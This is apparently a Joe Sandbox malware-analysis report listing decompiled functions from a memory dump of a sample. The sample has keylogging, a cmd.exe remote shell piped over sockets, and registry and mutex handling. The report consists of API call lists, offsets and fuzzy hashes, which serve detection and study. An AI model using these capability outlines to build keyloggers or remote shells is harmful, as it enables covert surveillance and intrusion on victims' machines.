                                                                                                                                                                                          APIs
                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 12334852
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,1233530B,?,?,00000000,00000000,?,Offline Keylogger Started,00000000,12335208,?,00000000), ref: 1233488E
                                                                                                                                                                                            • Part of subcall function 1233489E: WSAStartup.WS2_32(00000202,00000000), ref: 123348B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateEventStartupsocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1953588214-0
                                                                                                                                                                                          • Opcode ID: bd920f450eb05400b285aaad9bafc4545678ecf1fa6e429bfd2ede7aa8f1eba4
                                                                                                                                                                                          • Instruction ID: d2caa88237913bcbd0c889fa390de20b9b7e80e7b1b6e8b75b45e729caf6b2da
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd920f450eb05400b285aaad9bafc4545678ecf1fa6e429bfd2ede7aa8f1eba4
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD0171B5858BE09FE7368F28A4857867FE4AB05314F044E5EF1DB9BB91C7B1A481CB10
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                                                                                                                                                          • Instruction ID: a210a0d6227235addd54fbba1c302f3f0c25aa062d896c6259d38078a23d13fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF027B3B152025ADB1E8B30C850B6A77BA5F80317F14CB6DF89BC54D4C730CA90C600
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 1234BAB8
                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 1234BACB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ForegroundText
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 29597999-0
                                                                                                                                                                                          • Opcode ID: 21ecbfe089474d1864fd893a540c151d17e775f3cf06ebacf64d52def975b389
                                                                                                                                                                                          • Instruction ID: 2904fc950bef337ad4530027acedee2392d73f01ee5aee753791b5ce37f9f911
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21ecbfe089474d1864fd893a540c151d17e775f3cf06ebacf64d52def975b389
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E0D876A4032827E73096A49C8DFF5776CEB04700F000199F61DD72C1E9B0AA04CBE0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12344EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,123A2ADC,123A50E4,00000000,12345188,00000000,00000001), ref: 12344F0B
                                                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 12344F10
                                                                                                                                                                                            • Part of subcall function 12344D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 12344DD5
                                                                                                                                                                                            • Part of subcall function 12344D86: LoadLibraryA.KERNEL32(?), ref: 12344E17
                                                                                                                                                                                            • Part of subcall function 12344D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 12344E37
                                                                                                                                                                                            • Part of subcall function 12344D86: FreeLibrary.KERNEL32(00000000), ref: 12344E3E
                                                                                                                                                                                            • Part of subcall function 12344D86: LoadLibraryA.KERNEL32(?), ref: 12344E76
                                                                                                                                                                                            • Part of subcall function 12344D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 12344E88
                                                                                                                                                                                            • Part of subcall function 12344D86: FreeLibrary.KERNEL32(00000000), ref: 12344E8F
                                                                                                                                                                                            • Part of subcall function 12344D86: GetProcAddress.KERNEL32(00000000,?), ref: 12344E9E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1170566393-0
                                                                                                                                                                                          • Opcode ID: bdc3a521075f6f1699fa2bd54c2a0d7c2949892d391c994b78be4b1fd44e96ad
                                                                                                                                                                                          • Instruction ID: 7f4238ad9fee826ef3e854574ecb7a0d2821e2648c03224bfe085865b919f79b
                                                                                                                                                                                          • Opcode Fuzzy Hash: bdc3a521075f6f1699fa2bd54c2a0d7c2949892d391c994b78be4b1fd44e96ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BD012732411316FE360A6594C44BBAD6DCDBD67607150576F914D3100DA508C4186A0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123418B2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: aa9612c468631c8733b0ba7410eaa7de454ed8386f5af0c55508338788386e1a
                                                                                                                                                                                          • Instruction ID: f711058848295697c56a826315088b26dcb9320567ba81d86b7dce9f9cd7f59c
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa9612c468631c8733b0ba7410eaa7de454ed8386f5af0c55508338788386e1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11E373B105429FD3049E19C884F96B7BAFF81715B654398E186CB292DF31E851C690
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12339DE4 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                                          • Opcode ID: e2370c0e7dacc0b19a5211f7bb573ce0c44a36e09d7091f9183fd7dd9d28dcfc
                                                                                                                                                                                          • Instruction ID: 57d122a2eb724fc6a5401fd7e316cf43985e89a6ceffd68346df42549a77fd79
                                                                                                                                                                                          • Opcode Fuzzy Hash: e2370c0e7dacc0b19a5211f7bb573ce0c44a36e09d7091f9183fd7dd9d28dcfc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A1172379002099FCB66DF64E8509FF7BF9AF54311B10412AE84696290FF74BA16CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123800D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12375AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,123782CA,00000001,00000364,?,1236BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 12375B34
                                                                                                                                                                                          • _free.LIBCMT ref: 12380140
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                          • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                                                                                                                                                                          • Instruction ID: f3ea1d635e7ce5edcfa66797b589729cbadf998a11106240ba0283360f808c70
                                                                                                                                                                                          • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15012B776003859BE3318E69D885AA9FBD8EB85370F25071DD594872C0E630A805C674
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233A367 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CallNextHookEx.USER32(123A50F0,?,?,?), ref: 1233A3D2
                                                                                                                                                                                            • Part of subcall function 1233B646: GetKeyState.USER32(00000011), ref: 1233B64B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallHookNextState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3280314413-0
                                                                                                                                                                                          • Opcode ID: d622c44fbf08cdb5a77c438a9687f244e71aae25bec6e5541689a5a8e5439c9f
                                                                                                                                                                                          • Instruction ID: 5c911240a6d55aa560c2b8256ce3a3f68374608da5dcb851fd4ce1831b2d42f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: d622c44fbf08cdb5a77c438a9687f244e71aae25bec6e5541689a5a8e5439c9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF028B77042055BCB1B9EB4DC84DBEBB9AEBC6327F000A2DE80286552DA61E609C710
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12375AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,123782CA,00000001,00000364,?,1236BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 12375B34
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: 32243b7623f6a6b2535693a5bb3c29dd9be240d9eb608f03e664349569589499
                                                                                                                                                                                          • Instruction ID: 20deef0bf423a7142b0baa448b10b258b5881f3859091516c13fe29879c4d092
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32243b7623f6a6b2535693a5bb3c29dd9be240d9eb608f03e664349569589499
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0E9B36441785ADF795A22AC44FBBB74DAF40771B418211EC18EA1C0CF28E800C6F0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12376137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,123652BC,?,?,12368847,?,?,00000000,?,?,1233DE62,123652BC,?,?,?,?), ref: 12376169
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: 6e5e8e2758ca9d7dc12c922437e44a273a580d62e1ab66211850df98e2452fc7
                                                                                                                                                                                          • Instruction ID: 5c614e2fa5168a4e45addadbfe276c71d415ab97adf61a0b01644bf3b4fda2bb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5e8e2758ca9d7dc12c922437e44a273a580d62e1ab66211850df98e2452fc7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E065379442256EDF2216655C2CB9B775D9B413B1F010225DC1596182DF2CD402E9E0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 123348B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                                          • Opcode ID: ea5383319e0787fb25feb871811165c8455f71fa66e29a41c3246c4892c52212
                                                                                                                                                                                          • Instruction ID: e0041d8d1d769095c86484de1a4a9d9f445aff3ea5c223f152ee74aed81739cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea5383319e0787fb25feb871811165c8455f71fa66e29a41c3246c4892c52212
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD012735A862C5EF621A9B49C4F8E4775CC352615F000BAAECBAC36C2EA40171CC2B7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123327A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Deallocate.LIBCONCRT ref: 12332E2B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Deallocatestd::_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1323251999-0
                                                                                                                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                          • Instruction ID: b99b25cc8ba40a518aa52ec276326e0acc421b75c2d468e1ddb2ff4fea5a4705
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81B0923B4042007ACA536680AC42B5FB7A2ABA4B11F04C914BA9918161D2728728D602
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12341CA3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,12341DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 12341CB3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 5f8fc32552f98c10d4aaf45c571837f49f6b6d58775d6784bd4be36191dceb83
                                                                                                                                                                                          • Instruction ID: d37f656d647a7ee444b81714c66f9eac2fb80986a19584f832f3ecad2d0f1fa1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8fc32552f98c10d4aaf45c571837f49f6b6d58775d6784bd4be36191dceb83
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54B008B2458392AFCF02DF90CD4492EBAB6BBC8341F184D5CF2A64516087228428EB02
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 0059F7A7 Relevance: 42.8, APIs: 3, Strings: 21, Instructions: 795COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                                          • String ID: SG$ SG$8SG$8SG$PSG$dMG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                                          • API String ID: 3519838083-419171480
                                                                                                                                                                                          • Opcode ID: 199031d79b4a41a334a9cd24d8b34a5cd595dbc2da4f6ada28a0c3ca32364395
                                                                                                                                                                                          • Instruction ID: 2647dcded3d1af567f027b6f2d329f938d898989b9dfe75feb62994de44647dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 199031d79b4a41a334a9cd24d8b34a5cd595dbc2da4f6ada28a0c3ca32364395
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0329260B443833BDF19B7705C5FF7E2E8ABBD1700F104429B5469B6D2EEA88D458366
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 123356E6
                                                                                                                                                                                            • Part of subcall function 12334AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 12335723
                                                                                                                                                                                          • CreatePipe.KERNEL32(123A6CCC,123A6CB4,123A6BD8,00000000,123960BC,00000000), ref: 123357B6
                                                                                                                                                                                          • CreatePipe.KERNEL32(123A6CB8,123A6CD4,123A6BD8,00000000), ref: 123357CC
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,123A6BE8,123A6CBC), ref: 1233583F
                                                                                                                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 12335897
                                                                                                                                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 123358BC
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 123358E9
                                                                                                                                                                                            • Part of subcall function 12364770: __onexit.LIBCMT ref: 12364776
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,123A4F90,123960C0,00000062,123960A4), ref: 123359E4
                                                                                                                                                                                          • Sleep.KERNEL32(00000064,00000062,123960A4), ref: 123359FE
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 12335A17
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 12335A23
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 12335A2B
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 12335A3D
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 12335A45
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                          • String ID: SystemDrive$cmd.exe
                                                                                                                                                                                          • API String ID: 2994406822-3633465311
                                                                                                                                                                                          • Opcode ID: f655cd7fa5f6816fcf8e35e60fd7257f561445eef2c7ae84019489914de031a2
                                                                                                                                                                                          • Instruction ID: f44b3312d455c8c5c402ac8cd5626737452cce00235c89a31556ca9c58c5738d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f655cd7fa5f6816fcf8e35e60fd7257f561445eef2c7ae84019489914de031a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C69107BB584228AFDB52AB34DCD0A7E7BADEBC4301B40093DF549D6291DE21AE04DF51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123420F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 12342106
                                                                                                                                                                                            • Part of subcall function 12343877: RegCreateKeyA.ADVAPI32(80000001,00000000,123960A4), ref: 12343885
                                                                                                                                                                                            • Part of subcall function 12343877: RegSetValueExA.KERNEL32(123960A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438A0
                                                                                                                                                                                            • Part of subcall function 12343877: RegCloseKey.ADVAPI32(123960A4,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438AB
                                                                                                                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 12342146
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 12342155
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,123427EE,00000000,00000000,00000000), ref: 123421AB
                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 1234241A
